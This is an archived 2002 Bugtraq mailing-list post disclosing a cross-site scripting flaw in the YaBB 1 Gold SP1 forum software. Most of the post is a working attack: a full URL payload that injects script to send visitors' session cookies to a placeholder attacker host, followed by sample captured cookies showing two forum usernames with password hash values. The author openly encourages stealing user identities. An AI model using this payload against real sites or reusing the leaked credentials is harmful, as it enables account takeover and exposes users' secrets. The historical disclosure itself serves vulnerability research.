[28067] in bugtraq
Cross-site Scripting Vulnerability in YaBB 1 Gold - SP1!
daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Fabricio=20Angelett)
Mon Dec 2 12:33:12 2002
Message-ID: <20021202005901.2542.qmail@web11603.mail.yahoo.com>
Date: Sun, 1 Dec 2002 18:59:01 -0600 (CST)
From: =?iso-8859-1?q?Fabricio=20Angeletti?= <f_a_a@yahoo.com>
To: bugtraq@securityfocus.com
In-Reply-To: <200211272312.SAA01132@ebbets.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269<Script>location%3d'Http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>
num is a post that doesn't exist
board must be a valid and accessable board
X.php script to log the cookie
that in an example of the cookie
268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY
Tested in YaBB 1 Gold - SP1!
i discover this now, i know isnt much but u can do
steal the user identity and maybe u can try to change
the password too (there is another old vuln but i dont
know if work here)
Sorry for my bad english
Bye
_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com
